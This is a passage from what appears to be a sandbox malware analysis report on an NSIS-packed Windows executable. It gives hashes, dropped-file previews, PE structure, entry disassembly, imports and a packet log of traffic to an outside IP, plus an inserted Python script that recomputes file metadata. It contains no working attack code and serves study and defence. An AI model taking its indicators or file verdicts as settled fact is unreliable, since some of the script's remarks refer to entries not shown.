                                                                      SHA-512:25664C0146EE3F98EE227142A5D981D144FB4743C3604E0DE5439717560337170358AC112BC3F107936A6FAE7A53D06853342C7360B17091443595409A5F3A3C
                                                                      Malicious:false
                                                                      Preview:......;.....S.......L.....k..u..Vd...(..G......i&.................#..[M.R.P.....P..r.P......`........J.......@\.......G-...,.g......................%{...PI.....H..}.....s....0....................E.............Bz...e9...5<..z............?...:.,....}.....G........9Tim........J..n............%.Cs.TQ..j+.<..d........g...Y...M....H.......&...8g.......t..$..$c.....>...`3...`IW4............a..............hB.......9....`......w.+4................;n....V....f....o..5....?N.H....Q...U.....M{...........................i..{.....s.l.......K....................q./.[.......h.).Q........x...P..".T....A..$........d....................O..E......5..........2.....R.....?.....Q...0......` ...,................q......O..0........l............................S....\...........M.s.....4........*..$...&V...^................o....3[...................].....G......v....T..........?O..L.....FxN?..........R..x..o.<.........:.............`...~.........q.B..B...........-...G.........&............y......2...
                                                                      Process:C:\Users\user\Desktop\160420241245287.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1104
                                                                      Entropy (8bit):4.863564030868141
                                                                      Encrypted:false
                                                                      SSDEEP:24:IiZYomu//XhTIXV+6u34BGN54II7KdqIIy7A9lEJXKs5of:IYYomKTW46u34BGrec7+qas5of
                                                                      MD5:6134A04DDA20A13A76A2D19F1BB8B034
                                                                      SHA1:B5B0EE4293E648262A32A27DF97A495831D60CA2
                                                                      SHA-256:CD0E48803CED99AF61447033FEF7150B8835CA1CD60B95770FAAD9D8D8827CFD
                                                                      SHA-512:86016AA7ABC59F34816CDB0E8B54554BE0EEE09A537A1ED11F16CAB7FA270B9AD0FCD35576F9AB4C20BB29DDB803E8EE5C6FD11FEA68FCB1EAB32ADABF389C24
                                                                      Malicious:false
                                                                      Preview:......s..U...;.S..............G).............&.:..O..N..#...............h......\..............h...L....(.....3.\.....V...=.....z...d..*...|eZ.......G...................I~...w..q..$.........`=..............s.....................Z....A......%.~y..!...?.....]6:..........s...?..[.........^..g...H.......................2.........w..........U).6........E.....v..i...s....!.d.=....J....p...0"...........p5....k...........#.................y..............t.......;........5......G.ht..........{O......:.].`H............?....s{.........'...(..-..a....../...?.7......L...~..O.........Wk.k......B...........1.............."......y.......:.........k........<....E..Kd...\....".[.=.......O...........k.......bI?9.s........<...............g..........n.&......7}.....P.[..B.H........."....xt...8T'....l.i*..!<...D.Y...aZ........D...........L..&.............U........R.S.g.......>.f5........W.....v...|.....O......+....$.......o...s/......&.b.........Nc.....ZV............c....3...........9...9"c.#.
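Added example (not part of the Joe Sandbox report or of the sample): a Python script that recomputes the per-file metadata listed above for a directory of dropped files (size, 8-bit Shannon entropy, the "Encrypted" flag, MD5/SHA-1/SHA-256/SHA-512, a coarse file-type guess) and parses the header fields that the static file info below prints (Imagebase, Entrypoint as a virtual address, Subsystem). Two caveats it makes visible: the "Entropy (8bit)" values of roughly 4.8 to 5.0 bits per byte for the dropped "data" files are far below the near-8.0 of compressed or encrypted content, which is why every one of them is "Encrypted:false"; and the one drop typed "DOS executable (COM)" (flagged Malicious:true yet 0% on VirusTotal) owes that label to a one-byte libmagic heuristic on the first opcode, not to any verified format, so the type string alone should not drive a verdict. The 7.5-bit "encrypted" threshold, the opcode set in the COM guess, the input files and the minimal PE header are constructed assumptions for the demonstration; SSDEEP and TLSH are not recomputed (they need external libraries).

```python
"""Recompute Joe Sandbox-style dropped-file metadata and static PE fields.

Added example for the report; every input below is constructed, not a real drop.
"""
import hashlib
import math
import struct
from collections import Counter

# Assumed threshold: Joe Sandbox does not publish its cut-off for "Encrypted".
ENCRYPTED_THRESHOLD = 7.5
SUBSYSTEMS = {2: "windows gui", 3: "windows cui"}


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def digests(data: bytes) -> dict:
    """Upper-case hex digests in the same order the report prints them."""
    algos = (("MD5", "md5"), ("SHA1", "sha1"), ("SHA-256", "sha256"), ("SHA-512", "sha512"))
    return {label: getattr(hashlib, fn)(data).hexdigest().upper() for label, fn in algos}


def guess_file_type(data: bytes) -> str:
    """Coarse type guess. The COM rule approximates libmagic: a first byte that is a
    plausible COM entry opcode (0xE9 jmp rel16, 0xEB jmp rel8) earns the label, so
    arbitrary junk can be typed 'DOS executable (COM)'. Opcode set is an assumption."""
    if data[:2] == b"MZ":
        return "PE32/MZ executable"
    if data[:1] in (b"\xe9", b"\xeb"):
        return "DOS executable (COM)"
    return "data"


def file_report(data: bytes, threshold: float = ENCRYPTED_THRESHOLD) -> dict:
    """One dropped-file record: type, size, entropy, encrypted flag and digests."""
    ent = shannon_entropy(data)
    rep = {"File Type": guess_file_type(data), "Size (bytes)": len(data),
           "Entropy (8bit)": ent, "Encrypted": ent >= threshold}
    rep.update(digests(data))
    return rep


def parse_pe(data: bytes) -> dict:
    """Read ImageBase, entry point and subsystem from a PE header.
    The report's 'Entrypoint' is a VA: ImageBase + AddressOfEntryPoint."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    opt = e_lfanew + 4 + 20                       # IMAGE_FILE_HEADER is 20 bytes
    (magic,) = struct.unpack_from("<H", data, opt)
    (entry_rva,) = struct.unpack_from("<I", data, opt + 0x10)
    if magic == 0x10B:                            # PE32: 4-byte ImageBase at +0x1C
        (image_base,) = struct.unpack_from("<I", data, opt + 0x1C)
    elif magic == 0x20B:                          # PE32+: 8-byte ImageBase at +0x18
        (image_base,) = struct.unpack_from("<Q", data, opt + 0x18)
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    (subsystem,) = struct.unpack_from("<H", data, opt + 0x44)
    return {"Imagebase": image_base, "Entrypoint": image_base + entry_rva,
            "Subsystem": SUBSYSTEMS.get(subsystem, f"unknown ({subsystem})")}


def build_demo_pe(entry_rva: int = 0x335A, image_base: int = 0x400000, subsystem: int = 2) -> bytes:
    """Constructed minimal PE32 header (not runnable code) whose fields reproduce the
    sample's static info: Imagebase 0x400000, Entrypoint 0x40335a, windows gui."""
    buf = bytearray(0x200)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)       # e_lfanew -> PE signature at 0x80
    buf[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<HH", buf, 0x84, 0x14C, 1)  # Machine = i386, one section
    struct.pack_into("<H", buf, 0x94, 0xE0)       # SizeOfOptionalHeader
    opt = 0x98
    struct.pack_into("<H", buf, opt, 0x10B)       # PE32 magic
    struct.pack_into("<I", buf, opt + 0x10, entry_rva)
    struct.pack_into("<I", buf, opt + 0x1C, image_base)
    struct.pack_into("<H", buf, opt + 0x44, subsystem)
    return bytes(buf)


# Constructed stand-ins for a drop directory (sizes echo the report, content does not).
DEMO_DROPS = {
    "drop_constant.bin": b"\x00" * 1159,              # entropy 0.0
    "drop_two_symbols.bin": b"ab" * 50,               # entropy exactly 1.0
    "drop_com_like.bin": b"\xe9" + bytes(range(256)) * 4,  # first byte = jmp rel16 opcode
    "sample_header.exe": build_demo_pe(),
}

if __name__ == "__main__":
    for name, blob in DEMO_DROPS.items():
        r = file_report(blob)
        print(f"{name}: {r['File Type']}, {r['Size (bytes)']} bytes, "
              f"entropy {r['Entropy (8bit)']:.3f}, encrypted={r['Encrypted']}, SHA-256 {r['SHA-256']}")
    pe = parse_pe(DEMO_DROPS["sample_header.exe"])
    print(f"Entrypoint:{pe['Entrypoint']:#x} Imagebase:{pe['Imagebase']:#x} Subsystem:{pe['Subsystem']}")
```

Point the `DEMO_DROPS` loop at real files read with `open(path, "rb")` to rebuild the table for a drop directory; compare the SHA-256 column against the report to confirm you are looking at the same artefacts, and treat the type and "Malicious" columns as triage hints, not detections.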
                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                      Entropy (8bit):6.629085334913185
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:160420241245287.exe
                                                                      File size:906'138 bytes
                                                                      MD5:0faf0632777806d9e8c13f1ca6fc3237
                                                                      SHA1:35fea792d63ba1e9deec1d2988bc6456322772d5
                                                                      SHA256:4585d06cb13de01241bf014db8d49149de7a77a9a0dc13b9007d08a402a035b3
                                                                      SHA512:cff4a23f7ca212a65c02737feec510cc4187586d2a4688747563f283ed5e31ab15fb92d05a609354fe8502d033c2839af1c3f9127a2c3f3390c6823e5b741d78
                                                                      SSDEEP:24576:HDgVtWN/pm/avooyRDtwZk8D2RncNogPgct/R:cpoxZDmndct/R
                                                                      TLSH:D615ADECBBB250EEE752D43D39C68EAD75E0EE311AD6091A357DBF1817312958EC2201
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L.....oS.................`...*......Z3.......p....@
                                                                      Icon Hash:330b9b9b1b3b7b3f
                                                                      Entrypoint:0x40335a
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x536FD79B [Sun May 11 20:03:39 2014 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:e221f4f7d36469d53810a4b5f9fc8966
                                                                      Instruction
                                                                      sub esp, 000002D4h
                                                                      push ebx
                                                                      push ebp
                                                                      push esi
                                                                      push edi
                                                                      push 00000020h
                                                                      xor ebp, ebp
                                                                      pop esi
                                                                      mov dword ptr [esp+14h], ebp
                                                                      mov dword ptr [esp+10h], 00409230h
                                                                      mov dword ptr [esp+1Ch], ebp
                                                                      call dword ptr [00407034h]
                                                                      push 00008001h
                                                                      call dword ptr [004070BCh]
                                                                      push ebp
                                                                      call dword ptr [004072ACh]
                                                                      push 00000008h
                                                                      mov dword ptr [00429298h], eax
                                                                      call 00007F5A087C491Ch
                                                                      mov dword ptr [004291E4h], eax
                                                                      push ebp
                                                                      lea eax, dword ptr [esp+34h]
                                                                      push 000002B4h
                                                                      push eax
                                                                      push ebp
                                                                      push 00420690h
                                                                      call dword ptr [0040717Ch]
                                                                      push 0040937Ch
                                                                      push 004281E0h
                                                                      call 00007F5A087C4587h
                                                                      call dword ptr [00407134h]
                                                                      mov ebx, 00434000h
                                                                      push eax
                                                                      push ebx
                                                                      call 00007F5A087C4575h
                                                                      push ebp
                                                                      call dword ptr [0040710Ch]
                                                                      cmp word ptr [00434000h], 0022h
                                                                      mov dword ptr [004291E0h], eax
                                                                      mov eax, ebx
                                                                      jne 00007F5A087C1A6Ah
                                                                      push 00000022h
                                                                      mov eax, 00434002h
                                                                      pop esi
                                                                      push esi
                                                                      push eax
                                                                      call 00007F5A087C3FC6h
                                                                      push eax
                                                                      call dword ptr [00407240h]
                                                                      mov dword ptr [esp+18h], eax
                                                                      jmp 00007F5A087C1B2Eh
                                                                      push 00000020h
                                                                      pop edx
                                                                      cmp cx, dx
                                                                      jne 00007F5A087C1A69h
                                                                      inc eax
                                                                      inc eax
                                                                      cmp word ptr [eax], dx
                                                                      je 00007F5A087C1A5Bh
                                                                      add word ptr [eax], 0000h
                                                                      Programming Language:
                                                                      • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7494 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4a000 | 0x6e5e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x2b8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5e68 | 0x6000 | 2f6554958e1a5093777de617d6e0bffc | False | 0.6566162109375 | data | 6.419811957742583 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1354 | 0x1400 | 2222fe44ebbadbc32af32dfc9c88e48e | False | 0.4306640625 | data | 5.037511188789184 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x202d8 | 0x600 | 9587277f9a9b39e2caf86eae07909d87 | False | 0.4733072916666667 | data | 3.757932017065988 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2a000 | 0x20000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4a000 | 0x6e5e0 | 0x6e600 | 09dfbe0d64143d5a10c5c9b97dc5629a | False | 0.3125022119195923 | data | 4.572941832996085 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x4a388 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 262144 | English | United States | 0.20716335769446992
RT_ICON | 0x8c3b0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | United States | 0.2816012066721874
RT_ICON | 0x9cbd8 | 0x963a | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9957096052836861
RT_ICON | 0xa6218 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864 | English | United States | 0.31847803237334454
RT_ICON | 0xaf6c0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | English | United States | 0.3807864903164856
RT_ICON | 0xb38e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | United States | 0.42012448132780084
RT_ICON | 0xb5e90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | English | United States | 0.4974202626641651
RT_ICON | 0xb6f38 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | English | United States | 0.5450819672131147
RT_ICON | 0xb78c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | English | United States | 0.6285460992907801
RT_DIALOG | 0xb7d28 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0xb7e28 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0xb7f48 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0xb8010 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0xb8070 | 0x84 | data | English | United States | 0.7045454545454546
RT_VERSION | 0xb80f8 | 0x1dc | data | English | United States | 0.5399159663865546
RT_MANIFEST | 0xb82d8 | 0x305 | XML 1.0 document, ASCII text, with very long lines (773), with no line terminators | English | United States | 0.5614489003880984
DLL | Import
KERNEL32.dll | CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll | RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 16, 2024 17:16:34.608203888 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:35.011389971 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:35.011503935 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:35.011692047 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:35.416344881 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:35.416461945 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:35.416498899 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:35.416537046 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:35.416543961 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:35.416543961 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:35.416543961 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:35.416594982 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:35.819684982 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:35.819710970 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:35.819722891 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:35.819753885 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:35.819767952 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:35.819780111 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:35.819792032 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:35.819791079 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:35.819808006 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:35.819870949 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:35.819871902 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.222728014 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.222785950 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.222824097 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.222842932 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.222861052 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.222883940 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.222883940 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.222897053 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.222912073 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.222934008 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.222943068 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.222970963 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.222979069 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.223007917 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.223014116 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.223043919 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.223051071 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.223079920 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.223090887 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.223114967 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.223131895 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.223150969 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.223164082 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.223186970 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.223200083 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.223222971 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.223236084 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.223259926 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.223269939 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.223297119 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.223306894 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.223346949 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.626648903 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.626671076 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.626686096 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.626699924 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.626712084 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.626723051 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.626734972 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.626738071 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.626748085 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.626760960 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.626770020 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.626771927 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.626780033 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.626784086 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.626796007 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.626801968 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.626806974 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.626811981 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.626821041 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.626832008 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.626842976 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.626843929 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.626853943 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.626866102 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.626869917 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.626877069 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.626883030 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.626888990 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.626902103 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.626913071 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.626923084 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.626931906 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.626935959 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.626940012 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.626946926 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.626959085 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.626971006 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.626976967 CEST | 49736 | 80 | 192.168.2.4 | 103.14.155.180
Apr 16, 2024 17:16:36.626983881 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
Apr 16, 2024 17:16:36.626996040 CEST | 80 | 49736 | 103.14.155.180 | 192.168.2.4
